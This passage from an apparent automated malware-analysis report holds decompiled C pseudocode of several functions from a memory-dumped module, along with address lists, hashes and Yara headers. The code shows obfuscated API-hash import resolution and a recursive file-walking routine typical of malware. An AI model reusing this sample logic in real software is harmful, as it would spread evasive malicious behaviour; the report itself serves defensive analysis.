						_t276 = _t276 + 0x18;
						_t251 = _t140 + 0xf9674d63;
						_t231 = _a4;
						_t19 = _t231 + 8; // 0x89559090
						_t219 =  *_t19;
						__eflags = _t251 - _t219;
					} while (__eflags != 0);
				}
				 *(_t231 + 0x18) = _t257;
				_t79 = _t231 + 0x1c; // 0x89c1940f
				_t250 = _t257;
				_t258 = _t231;
				_t232 = E6E1977D0(__eflags,  *_t79 & 0x00000001, 0);
				__eflags = _t232 & 0x00000001;
				if((_t232 & 0x00000001) == 0) {
					_t82 = _t258 + 0x10; // 0xd5f5e8
					__eflags = _t250 -  *_t82;
					_t84 = _t250 ==  *_t82;
					__eflags = _t84;
					return 0 | _t84;
				}
				goto L36;
			}

0x6e1a9da9
0x6e1a9dac
0x6e1a9db4
0x6e1a9dc3
0x6e1a9dc8
0x6e1a9dcb
0x6e1a9dcd
0x6e1a9dda
0x6e1a9de9
0x6e1a9dee
0x6e1a9df5
0x6e1a9df8
0x6e1a9df8
0x6e1a9dfd
0x6e1a9e5f
0x6e1a9e5f
0x6e1a9e66
0x6e1a9e6d
0x00000000
0x6e1a9e6d
0x6e1a9dff
0x6e1a9e07
0x6e1a9e0b
0x6e1a9e0f
0x6e1a9e10
0x6e1a9e10
0x6e1a9e15
0x6e1a9e1a
0x6e1a9e21
0x6e1a9e26
0x6e1a9e29
0x6e1a9e2b
0x00000000
0x00000000
0x6e1a9e49
0x6e1a9e4e
0x6e1a9e53
0x6e1a9e56
0x6e1a9e56
0x6e1a9e5b
0x6e1a9e5d
0x00000000
0x00000000
0x00000000
0x6e1a9e5d
0x6e1aa0bd
0x6e1aa0c0
0x00000000
0x6e1aa0c3
0x6e1a9e74
0x6e1a9e7b
0x6e1a9e7b
0x6e1a9e7e
0x6e1a9e80
0x6e1a9e82
0x6e1aa0c7
0x6e1aa0c7
0x6e1a9e88
0x6e1a9e88
0x6e1a9edc
0x6e1a9edc
0x6e1a9edf
0x6e1a9edf
0x6e1a9ee2
0x6e1a9ee6
0x6e1a9ee8
0x6e1a9e90
0x6e1a9e93
0x6e1a9e93
0x6e1a9e96
0x6e1aa145
0x00000000
0x6e1aa145
0x00000000
0x6e1a9eea
0x6e1a9eea
0x6e1a9eea
0x6e1a9eee
0x6e1a9ef0
0x6e1aa106
0x6e1aa109
0x6e1aa109
0x6e1aa110
0x6e1aa111
0x6e1aa115
0x6e1aa11a
0x6e1aa11d
0x6e1aa11f
0x00000000
0x00000000
0x6e1aa121
0x6e1aa122
0x6e1aa125
0x6e1aa128
0x6e1aa12c
0x6e1aa12f
0x00000000
0x00000000
0x00000000
0x6e1aa12f
0x6e1aa131
0x6e1aa134
0x6e1aa15d
0x6e1aa161
0x6e1aa16c
0x6e1aa175
0x6e1aa17a
0x6e1aa17d
0x6e1aa180
0x6e1aa183
0x6e1aa186
0x6e1aa186
0x6e1aa189
0x6e1aa18b
0x00000000
0x00000000
0x6e1aa191
0x6e1aa193
0x6e1aa196
0x6e1aa196
0x6e1aa19b
0x6e1aa1b3
0x6e1aa1c2
0x6e1aa1d2
0x6e1aa1e0
0x6e1aa1e8
0x6e1aa1eb
0x6e1aa1ed
0x6e1aa1ff
0x6e1aa204
0x6e1aa209
0x6e1aa20c
0x6e1aa210
0x00000000
0x00000000
0x6e1aa212
0x6e1aa212
0x6e1aa217
0x6e1aa21c
0x6e1aa21f
0x6e1aa221
0x6e1aa223
0x6e1aa226
0x00000000
0x00000000
0x00000000
0x6e1aa22c
0x00000000
0x6e1aa231
0x6e1aa13b
0x6e1aa13e
0x00000000
0x6e1aa141
0x6e1a9ef6
0x6e1a9ef9
0x6e1a9ef9
0x6e1a9efc
0x6e1aa14d
0x00000000
0x6e1aa14d
0x6e1a9f02
0x6e1a9f04
0x6e1a9f07
0x6e1a9f07
0x6e1a9f0e
0x6e1a9f14
0x6e1a9f19
0x6e1a9f1c
0x6e1a9f1e
0x6e1a9f6b
0x6e1a9f6d
0x6e1a9f70
0x6e1a9f73
0x6e1a9f75
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a9f20
0x6e1a9f22
0x6e1a9f2c
0x6e1a9f2f
0x6e1aa04d
0x6e1aa052
0x6e1aa057
0x6e1a9f35
0x6e1a9f45
0x6e1a9f50
0x6e1a9f59
0x6e1a9f5e
0x6e1a9f64
0x6e1a9f64
0x6e1aa05a
0x6e1aa05d
0x6e1aa05f
0x6e1a9f7b
0x6e1a9f7b
0x6e1a9f83
0x6e1a9f86
0x6e1a9f89
0x6e1a9fa5
0x6e1a9fbe
0x6e1a9fcf
0x6e1a9fd4
0x6e1a9fd7
0x6e1a9fda
0x6e1a9fdd
0x6e1aa0f8
0x6e1aa0fe
0x00000000
0x6e1aa0fe
0x6e1a9fe9
0x6e1a9fee
0x6e1a9ff1
0x6e1a9ff4
0x6e1a9ffa
0x6e1a9ffc
0x6e1a9fff
0x6e1aa06c
0x6e1aa06c
0x6e1aa072
0x6e1aa07b
0x6e1aa07d
0x00000000
0x00000000
0x6e1aa07f
0x6e1aa082
0x00000000
0x00000000
0x6e1aa087
0x6e1aa088
0x6e1aa08d
0x6e1aa093
0x6e1aa093
0x6e1aa096
0x00000000
0x00000000
0x6e1aa09b
0x6e1aa09b
0x6e1aa0a4
0x6e1aa0a9
0x6e1aa0ac
0x6e1aa0ae
0x00000000
0x00000000
0x6e1aa0b0
0x00000000
0x6e1aa001
0x6e1aa001
0x6e1aa003
0x00000000
0x6e1aa005
0x6e1aa008
0x6e1aa00e
0x6e1aa012
0x6e1aa017
0x6e1aa01a
0x6e1aa01c
0x00000000
0x00000000
0x6e1aa025
0x6e1aa02f
0x6e1aa034
0x6e1aa037
0x6e1aa039
0x00000000
0x6e1aa03f
0x00000000
0x6e1aa03f
0x6e1aa039
0x6e1aa003
0x6e1aa065
0x6e1aa065
0x6e1aa065
0x00000000
0x6e1aa065
0x6e1aa05f
0x6e1a9f1e
0x6e1aa0f7
0x6e1aa0f7
0x6e1a9e9c
0x6e1a9eab
0x6e1a9ebe
0x6e1a9ec3
0x6e1a9ec8
0x6e1a9ece
0x6e1a9ed1
0x6e1a9ed1
0x6e1a9ed4
0x6e1a9ed4
0x6e1a9edc
0x6e1aa0c9
0x6e1aa0cc
0x6e1aa0d5
0x6e1aa0d7
0x6e1aa0e1
0x6e1aa0e5
0x6e1aa0e8
0x6e1aa0ea
0x6e1aa0ea
0x6e1aa0ed
0x6e1aa0ed
0x00000000
0x6e1aa0ed
0x00000000

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed0c8f9ece9f943175343a250f3c19751dec846fd81c3b115745a6db7b2260a6
Instruction ID: 71f94d4fac5d567a6184eb1ce72c61a8a78987d5b895c22cf2d4fd17bc83fd99
Opcode Fuzzy Hash: ed0c8f9ece9f943175343a250f3c19751dec846fd81c3b115745a6db7b2260a6
Instruction Fuzzy Hash: 23D106B9E042156FDB00CFE8EC81AFE77B9AB15358F140524E914AB342E732DDC5A7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F420, Relevance: .3, Instructions: 297
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E19F420(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed char _v17;
				signed int _v18;
				signed int _v19;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				char _v584;
				signed int _v628;
				char _v1148;
				void* _t64;
				intOrPtr _t65;
				intOrPtr* _t67;
				signed int _t68;
				signed int _t78;
				signed int _t79;
				intOrPtr* _t82;
				intOrPtr* _t84;
				void* _t87;
				intOrPtr* _t88;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed char _t97;
				void* _t105;
				intOrPtr* _t108;
				void* _t111;
				intOrPtr* _t112;
				signed int _t114;
				intOrPtr* _t116;
				void* _t117;
				signed int _t121;
				signed char _t122;
				void* _t135;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed char _t141;
				intOrPtr _t149;
				signed int _t152;
				char* _t153;
				intOrPtr _t159;
				void* _t162;
				void* _t164;
				void* _t166;
				void* _t174;
				void* _t176;
				void* _t180;
				signed int _t192;

				_t64 = E6E1A3120(0x6e1b6028,  &_v36);
				_t153 =  &_v1148;
				_t65 = E6E1B2810(_t153, _a4, _t64);
				_t164 = _t162 + 0x14;
				if(_t65 == 0) {
					L27:
					return _t65;
				}
				_t67 = E6E1B09C0(0, E6E194E30(0x62830bda));
				_t166 = _t164 + 0xc;
				_t140 =  &_v628;
				_t65 =  *_t67(_t153, _t140);
				_v28 = _t65;
				_t188 = _t65 - 0xffffffff;
				if(_t65 == 0xffffffff) {
					goto L27;
				}
				_t149 = _a28;
				_t121 = _a16;
				_t68 = E6E192880(_t188, 2, 0xffffffff);
				_t122 = _t121 >> 3;
				_v24 = E6E1994B0(_t188, _t122, E6E1994B0(_t188, 1, 0xff) & 0x000000ff) & _t122;
				E6E19B820(_t122, 1);
				_v17 = E6E1994B0(_t188, 1, 0xff) &  !_v24 & 0x00000001 |  !_v24 & 0x00000001;
				_v24 = E6E192880(_t188, _a16, 0xffffffff);
				_t78 = E6E194E30(0x727042b8);
				_t79 = E6E1947E0(_v24, 0xfffffffe);
				_t174 = _t166 + 0x3c;
				_v32 =  !_t79 & ( !_t78 | 0x1a157de5);
				_v24 = (_t68 ^ _t121) & _a16;
				if(_t149 != 0) {
					L7:
					_t82 = E6E1B09C0(0, 0x79eae4);
					_t174 = _t174 + 8;
					_push(0);
					_push(_t149);
					if( *_t82() != 0x102) {
						goto L26;
					}
					goto L8;
				} else {
					do {
						L8:
						_t87 = E6E1B2040( &_v584);
						_t176 = _t174 + 4;
						if(_t87 != 0) {
							L5:
							_t88 = E6E1B09C0(0, 0x2a85667);
							_t174 = _t176 + 8;
							_t140 =  &_v628;
							_push(_t140);
							_push(_v28);
							if( *_t88() == 0) {
								L26:
								_t84 = E6E1B09C0(0, 0x4aa5b95);
								return  *_t84(_v28);
							}
							goto L6;
						}
						_v19 = (_a16 & 0x00000004) == 0;
						_t192 = _v24;
						_v18 = _t192 != 0;
						_t91 = E6E192880(_t192, 0x10, 0xffffffff);
						_t92 = E6E194E30(0x4c4802a3);
						E6E1947E0( !_v628, _t91);
						_t94 = E6E194E30(0x4c4802a3);
						_t180 = _t176 + 0x18;
						_t141 = _t140 & 0xffffff00 | _t192 != 0x00000000;
						_t97 = (_t94 |  !_t92) & 0xffffff00 | _t192 == 0x00000000 | _v18 ^ _t141;
						if(((_v19 | _t141) ^ _t97) == 1 || _t97 == 0) {
							if(_a12 == 0) {
								L15:
								if(_v17 != 0) {
									goto L21;
								}
								goto L18;
							} else {
								_t152 = 0;
								while(1) {
									_t114 = E6E194E30(0x68653f5e);
									_t116 = E6E1B09C0(_t114, E6E194E30(0x69306b3a));
									_t117 =  *_t116( &_v584,  *((intOrPtr*)(_a8 + _t152 * 4)));
									_t138 = E6E191A10( ~_t152, E6E199090(0, 0, 1));
									E6E191A10(_t152, 1);
									_t180 = _t180 + 0x28;
									if(_t117 != 0) {
										break;
									}
									_t139 =  ~_t138;
									_t152 = _t139;
									if(_t139 != _a12) {
										continue;
									}
									goto L15;
								}
								__eflags = _v17;
								if(__eflags == 0) {
									goto L21;
								}
								L18:
								_t111 = _a20(_a4,  &_v628, _a24);
								_t174 = _t180 + 0xc;
								if(_t111 == 0) {
									goto L26;
								}
								_t201 = _a36;
								if(_a36 != 0) {
									_t112 = E6E1B09C0(0, 0x7a2bc0);
									_t180 = _t174 + 8;
									 *_t112(_a36);
								}
								goto L21;
							}
						} else {
							L21:
							_t135 = E6E192880(_t201,  !_v628 | 0xffffffef, 0xffffffff);
							E6E194E30(0x68653f4d);
							_t176 = _t180 + 0xc;
							_t149 = _a28;
							if(_v32 != 0 && _t135 != 0) {
								_t105 = E6E1B2810( &_v1148, _a4,  &_v584);
								_t176 = _t176 + 0xc;
								if(_t105 != 0) {
									_t159 = _a32;
									if(_t159 != 0) {
										_t108 = E6E1B09C0(0, 0x7a2bc0);
										_t176 = _t176 + 8;
										 *_t108(_t159);
									}
									E6E19F420( &_v1148, _a8, _a12, _a16, _a20, _a24, _t149, _t159, _a36);
									_t176 = _t176 + 0x24;
									0;
									0;
								}
							}
							goto L5;
						}
						L6:
					} while (_t149 == 0);
					goto L7;
				}
			}

0x6e19f435
0x6e19f43d
0x6e19f448
0x6e19f44d
0x6e19f452
0x6e19f78b
0x6e19f78b
0x6e19f78b
0x6e19f468
0x6e19f46d
0x6e19f470
0x6e19f478
0x6e19f47a
0x6e19f47d
0x6e19f480
0x00000000
0x00000000
0x6e19f486
0x6e19f489
0x6e19f490
0x6e19f49c
0x6e19f4bd
0x6e19f4c3
0x6e19f4e8
0x6e19f4f8
0x6e19f500
0x6e19f511
0x6e19f516
0x6e19f523
0x6e19f529
0x6e19f52e
0x6e19f587
0x6e19f58e
0x6e19f593
0x6e19f596
0x6e19f598
0x6e19f5a0
0x00000000
0x00000000
0x00000000
0x6e19f530
0x6e19f5a6
0x6e19f5a6
0x6e19f5ad
0x6e19f5b2
0x6e19f5b7
0x6e19f560
0x6e19f567
0x6e19f56c
0x6e19f56f
0x6e19f575
0x6e19f576
0x6e19f57d
0x6e19f76d
0x6e19f774
0x00000000
0x6e19f77f
0x00000000
0x6e19f57d
0x6e19f5be
0x6e19f5c2
0x6e19f5c6
0x6e19f5d6
0x6e19f5e5
0x6e19f5f3
0x6e19f602
0x6e19f607
0x6e19f610
0x6e19f61e
0x6e19f62a
0x6e19f638
0x6e19f6ab
0x6e19f6af
0x00000000
0x00000000
0x00000000
0x6e19f63a
0x6e19f63a
0x6e19f640
0x6e19f645
0x6e19f65e
0x6e19f673
0x6e19f691
0x6e19f696
0x6e19f69b
0x6e19f6a0
0x00000000
0x00000000
0x6e19f6a2
0x6e19f6a7
0x6e19f6a9
0x00000000
0x00000000
0x00000000
0x6e19f6a9
0x6e19f6b3
0x6e19f6b7
0x00000000
0x00000000
0x6e19f6b9
0x6e19f6c6
0x6e19f6c9
0x6e19f6ce
0x00000000
0x00000000
0x6e19f6d4
0x6e19f6d8
0x6e19f6e1
0x6e19f6e6
0x6e19f6ec
0x6e19f6ec
0x00000000
0x6e19f6d8
0x6e19f6f0
0x6e19f6f0
0x6e19f706
0x6e19f70d
0x6e19f712
0x6e19f719
0x6e19f71c
0x6e19f73b
0x6e19f740
0x6e19f745
0x6e19f74b
0x6e19f750
0x6e19f75d
0x6e19f762
0x6e19f766
0x6e19f766
0x6e19f54d
0x6e19f552
0x6e19f55b
0x6e19f55f
0x6e19f55f
0x6e19f745
0x00000000
0x6e19f71c
0x6e19f583
0x6e19f583
0x00000000
0x6e19f5a6

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bad648058812920eba4f89d53b826769fec05d2aa16d03c9e4e9bf279a09ace
Instruction ID: d4a633a95c7eea59e6447488262c529a6083cb56360901da1aaba0336507b6c0
Opcode Fuzzy Hash: 9bad648058812920eba4f89d53b826769fec05d2aa16d03c9e4e9bf279a09ace
Instruction Fuzzy Hash: AE91F9B6D402097BEF11CEE0AC41BFE37699F1531DF140520FD2872191E7768AD9B6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AFA40, Relevance: .2, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1AFA40(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				signed int _v24;
				intOrPtr* _v28;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v316;
				void* _t57;
				void* _t58;
				signed int _t65;
				void* _t67;
				void* _t70;
				void* _t71;
				intOrPtr* _t73;
				void* _t76;
				void* _t79;
				void* _t80;
				void* _t84;
				void* _t88;
				void* _t92;
				void* _t95;
				signed int _t103;
				intOrPtr _t105;
				intOrPtr _t126;
				unsigned int _t141;
				intOrPtr _t142;
				intOrPtr _t144;
				intOrPtr* _t145;
				signed int _t146;
				void* _t147;
				void* _t148;
				void* _t151;
				void* _t155;

				_t155 = __eflags;
				_v48 = __ecx + 0x14;
				_v28 = __ecx;
				_v44 = __ecx + 8;
				_t142 = 0xffffffff;
				_t146 = 1;
				_v24 = 0;
				do {
					_t141 = _t146 * 0xaaaaaaab >> 0x20 >> 1;
					_v20 = _t142;
					_t117 =  ==  ? 0x927c0 : 0x2bf20;
					_v56 =  ==  ? 0x927c0 : 0x2bf20;
					_t57 = E6E1B0350(_v28, _t155);
					_t143 = _a4;
					_t58 = E6E19BB60(_t57,  *_v28, _t57, _a4);
					_t148 = _t147 + 0xc;
					if(_t58 == 0) {
						L8:
						_t144 = _v20;
						L9:
						_t65 = E6E19B820(E6E1994B0(_t161, (E6E1994B0(_t161, 1, 0xff) |  !_v24) & 0x000000ff, 0xff) & 0x000000ff, 0xff);
						_t151 = _t148 + 0x18;
						_t103 = _t65;
						if(_t65 != 0) {
							break;
						}
						goto L10;
					}
					_t67 = E6E1B34D0(_t143);
					_t157 = _t67 - 0x15;
					if(_t67 < 0x15) {
						goto L8;
					}
					E6E19D780(_t141, _t157,  &_v316);
					_t70 = E6E1B34D0(_t143);
					_t71 = E6E1B3C40(_a4);
					_t105 = _a4;
					E6E1AC850(_t71, _t70,  &_v316);
					_t148 = _t148 + 0x10;
					_t73 = E6E1B3C40(_t105);
					_t145 = _t73;
					if( *_t73 !=  *_v28) {
						goto L8;
					}
					_v52 = E6E1B34D0(_t105);
					_t76 = E6E194E30(0x979ac0b6);
					_t148 = _t148 + 4;
					_t126 = _t105;
					_t107 = _t76 + _v52;
					if(_t76 + _v52 <  *((intOrPtr*)(_t145 + 0xc))) {
						goto L8;
					}
					_t79 = E6E19A430(E6E1B3C40(_t126) + 0x15, _t107);
					_t148 = _t148 + 8;
					_t160 = _t79 -  *((intOrPtr*)(_t145 + 0x10));
					if(_t79 !=  *((intOrPtr*)(_t145 + 0x10))) {
						goto L8;
					}
					_t80 = E6E1B0350(_v28, _t160);
					_t161 = _t80 -  *((intOrPtr*)(_t145 + 4));
					_t144 = _v20;
					if(_t80 ==  *((intOrPtr*)(_t145 + 4))) {
						_t84 = E6E19E960(E6E1B3F20( &_v40, _t161, _a4), _t161, 0xfff, 0xffff);
						E6E1B3E20( &_v40, E6E1B34D0( &_v40) + _t84);
						_t88 = E6E1B34D0( &_v40);
						E6E1AC850(E6E1B3C40( &_v40), _t88, _v48);
						_v24 = E6E1B34D0( &_v40);
						_t92 = E6E1B3C40( &_v40);
						E6E1B1F00(E6E1B3440(_v44), _v44, _t141, _t161, _t93, _t92, _v24);
						_t148 = _t148 + 0x20;
						_t95 = E6E1B3C40(_a4);
						E6E1B3DA0(_a4, E6E1B3C40(_a4), _t95 + 0x15);
						E6E1B30B0( &_v40, _t161);
						_v24 = 1;
					}
					goto L9;
					L10:
					_t65 = E6E1AAC50(_v56);
					_t147 = _t151 + 4;
					_t142 = _t144 - 1;
					_t146 = _t146 + 1;
				} while (_t65 != 0);
				return _t65 & 0xffffff00 | _t103 != 0x00000000;
			}

0x6e1afa40
0x6e1afa4f
0x6e1afa52
0x6e1afa58
0x6e1afa5b
0x6e1afa60
0x6e1afa65
0x6e1afa70
0x6e1afa79
0x6e1afa7e
0x6e1afa8d
0x6e1afa90
0x6e1afa98
0x6e1afa9d
0x6e1afaa4
0x6e1afaa9
0x6e1afaae
0x6e1afc20
0x6e1afc20
0x6e1afc23
0x6e1afc55
0x6e1afc5a
0x6e1afc5d
0x6e1afc61
0x00000000
0x00000000
0x00000000
0x6e1afc61
0x6e1afab6
0x6e1afabb
0x6e1afabe
0x00000000
0x00000000
0x6e1afacb
0x6e1afad5
0x6e1afadf
0x6e1afaec
0x6e1afaf0
0x6e1afaf5
0x6e1afafa
0x6e1afaff
0x6e1afb08
0x00000000
0x00000000
0x6e1afb15
0x6e1afb1d
0x6e1afb22
0x6e1afb25
0x6e1afb29
0x6e1afb2f
0x00000000
0x00000000
0x6e1afb3f
0x6e1afb44
0x6e1afb47
0x6e1afb4a
0x00000000
0x00000000
0x6e1afb53
0x6e1afb58
0x6e1afb5b
0x6e1afb5e
0x6e1afb7c
0x6e1afb96
0x6e1afb9d
0x6e1afbb1
0x6e1afbc1
0x6e1afbc7
0x6e1afbdb
0x6e1afbe0
0x6e1afbe6
0x6e1afbfd
0x6e1afc05
0x6e1afc0c
0x6e1afc0c
0x00000000
0x6e1afc63
0x6e1afc66
0x6e1afc6b
0x6e1afc6e
0x6e1afc6f
0x6e1afc70
0x6e1afc87

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1ea0f8ec29e6bcf832b40f9d0769e52c43027869fea910aae5c7df541e13aa
Instruction ID: bc777abe7d9a4d282ea770fd6d9c653ae9950f4342ed97c27cd49b70226ab06c
Opcode Fuzzy Hash: bc1ea0f8ec29e6bcf832b40f9d0769e52c43027869fea910aae5c7df541e13aa
Instruction Fuzzy Hash: 81510575E001096BCB04DBE4DC849FEB3BDAF58308F500835E905AB385EB719E95A7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AAE80, Relevance: .2, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6E1AAE80(void* __eax, char* _a4, char* _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _t32;
				void* _t39;
				void* _t46;
				signed int _t47;
				void* _t49;
				void* _t50;
				signed char _t51;
				signed int _t55;
				signed int _t57;
				char _t58;
				char _t59;
				signed int _t60;
				signed int _t61;
				char* _t65;
				signed int _t66;
				signed int _t69;
				char _t73;
				char* _t74;
				intOrPtr _t77;
				void* _t78;
				void* _t79;
				void* _t80;

				_t74 = _a8;
				_t65 = _a4;
				if(_t65 != 0 || _t74 == 0) {
					L3:
					_t32 = E6E198BA0(_t74, 0);
					_t80 = _t79 + 8;
					if(_t65 == 0 || (_t32 & 0x00000001) == 0) {
						L6:
						_t63 = 0;
						if(((_t32 ^ (_t61 & 0xffffff00 | _t65 == 0x00000000)) & 0x00000001) != 0 || _t65 != 0) {
							_t57 = _a16;
							_t66 = _a12;
							if(( !(_t66 ^ _t57) & _t57) == 0xffffffff) {
								_t63 = _a4;
								_t58 =  *_t74;
								_t39 = E6E194E30(0xc9a319a0);
								_t80 = _t80 + 4;
								_t69 = _t39 +  *_a4 - _t58 + 0x5e39d903;
								__eflags = _t69;
								if(_t69 != 0) {
									goto L27;
								} else {
									_t77 = 1;
									while(1) {
										__eflags = _t58;
										if(__eflags == 0) {
											goto L29;
										}
										_v20 =  *((char*)(_a4 + _t77));
										_t58 =  *((char*)(_a8 + _t77));
										_t46 = E6E199090(__eflags, 0, _t58);
										_t80 = _t80 + 8;
										_t77 = _t77 + 1;
										_t69 = _t46 + _v20;
										__eflags = _t69;
										if(_t69 == 0) {
											continue;
										} else {
											goto L27;
										}
										goto L30;
									}
									goto L29;
								}
							} else {
								if(_t66 == 0xffffffff) {
									_t47 = E6E19E450(_a4);
									_t80 = _t80 + 4;
									_t69 = _t47;
									__eflags = _t57 - 0xffffffff;
									if(_t57 != 0xffffffff) {
										goto L11;
									} else {
										goto L25;
									}
								} else {
									if(_t57 == 0xffffffff) {
										L25:
										_t55 = E6E19E450(_t74);
										_t80 = _t80 + 4;
										_t57 = _t55;
										__eflags = _t57;
										if(_t57 != 0) {
											goto L12;
										} else {
											goto L26;
										}
									} else {
										L11:
										if(_t57 == 0) {
											L26:
											_t49 = E6E199090(__eflags, _t69 + E6E194E30(0xced46ce0), _t57);
											_t50 = E6E194E30(0xced46ce0);
											_t80 = _t80 + 0x10;
											_t69 = _t49 - _t50;
											__eflags = _t69;
											goto L27;
										} else {
											L12:
											if(_t69 == 0 || _t69 != _t57) {
												goto L26;
											} else {
												_t51 = E6E19A1E0(_t57, 0);
												_t80 = _t80 + 8;
												if((_t51 & 0x00000001) == 0) {
													L27:
													__eflags = _t69;
													_t28 = _t69 > 0;
													__eflags = _t28;
													if(_t28 == 0) {
														goto L29;
													} else {
														_t63 = 0xffffffffffffffff;
													}
												} else {
													_t78 = 0;
													_v20 = _t57;
													while(1) {
														_t73 =  *((char*)(_a4 + _t78));
														_t59 =  *((char*)(_a8 + _t78));
														E6E199090(0, _t73, _t59);
														_t80 = _t80 + 8;
														_t69 = _t73 - _t59;
														_t60 = _v20;
														if(_t69 != 0) {
															goto L27;
														}
														_t78 = _t78 + 1;
														if(_t60 != _t78) {
															continue;
														} else {
															L29:
															_t63 = 0;
														}
														goto L30;
													}
													goto L27;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t63 = 1;
						if(1 == 0) {
							goto L6;
						}
					}
				} else {
					_t63 = 0xffffffff;
					if(1 == 0) {
						goto L3;
					}
				}
				L30:
				return _t63;
			}

0x6e1aae87
0x6e1aae8a
0x6e1aae91
0x6e1aaea4
0x6e1aaea7
0x6e1aaeac
0x6e1aaeb1
0x6e1aaec4
0x6e1aaecb
0x6e1aaecf
0x6e1aaed9
0x6e1aaedc
0x6e1aaeea
0x6e1aaf5f
0x6e1aaf65
0x6e1aaf6f
0x6e1aaf74
0x6e1aaf7b
0x6e1aaf7b
0x6e1aaf81
0x00000000
0x6e1aaf87
0x6e1aaf87
0x6e1aaf90
0x6e1aaf90
0x6e1aaf92
0x00000000
0x00000000
0x6e1aaf9f
0x6e1aafa5
0x6e1aafac
0x6e1aafb1
0x6e1aafb6
0x6e1aafb7
0x6e1aafb7
0x6e1aafba
0x00000000
0x6e1aafbc
0x00000000
0x6e1aafbc
0x00000000
0x6e1aafba
0x00000000
0x6e1aaf90
0x6e1aaeec
0x6e1aaeef
0x6e1aafc1
0x6e1aafc6
0x6e1aafc9
0x6e1aafcb
0x6e1aafce
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1aaef5
0x6e1aaef8
0x6e1aafd4
0x6e1aafd5
0x6e1aafda
0x6e1aafdd
0x6e1aafdf
0x6e1aafe1
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1aaefe
0x6e1aaefe
0x6e1aaf00
0x6e1aafe7
0x6e1aaff8
0x6e1ab007
0x6e1ab00c
0x6e1ab00f
0x6e1ab00f
0x00000000
0x6e1aaf06
0x6e1aaf06
0x6e1aaf08
0x00000000
0x6e1aaf16
0x6e1aaf19
0x6e1aaf1e
0x6e1aaf23
0x6e1ab011
0x6e1ab013
0x6e1ab015
0x6e1ab015
0x6e1ab018
0x00000000
0x6e1ab01a
0x6e1ab01c
0x6e1ab01c
0x6e1aaf29
0x6e1aaf29
0x6e1aaf2b
0x6e1aaf30
0x6e1aaf33
0x6e1aaf3a
0x6e1aaf40
0x6e1aaf45
0x6e1aaf48
0x6e1aaf4a
0x6e1aaf4d
0x00000000
0x00000000
0x6e1aaf53
0x6e1aaf56
0x00000000
0x6e1aaf58
0x6e1ab022
0x6e1ab022
0x6e1ab022
0x00000000
0x6e1aaf56
0x00000000
0x6e1aaf30
0x6e1aaf23
0x6e1aaf08
0x6e1aaf00
0x6e1aaef8
0x6e1aaeef
0x6e1aaeea
0x6e1aaeb7
0x6e1aaeb7
0x6e1aaebe
0x00000000
0x00000000
0x6e1aaebe
0x6e1aae97
0x6e1aae97
0x6e1aae9e
0x00000000
0x00000000
0x6e1aae9e
0x6e1ab024
0x6e1ab02d

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f934bace636cc673b3e2411c62f40024d6c2e422052bfa30f13b4b87c0db351
Instruction ID: 1f7b253d61f31f0803ce138c1eb425f4893a281bde279b70cfb3c07dac4c537b
Opcode Fuzzy Hash: 4f934bace636cc673b3e2411c62f40024d6c2e422052bfa30f13b4b87c0db351
Instruction Fuzzy Hash: BD416DBE9005451BC75089FC9D90BFE32B85F6226CF350224DF3497285EB32D9C57181

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AB200, Relevance: .1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 100%

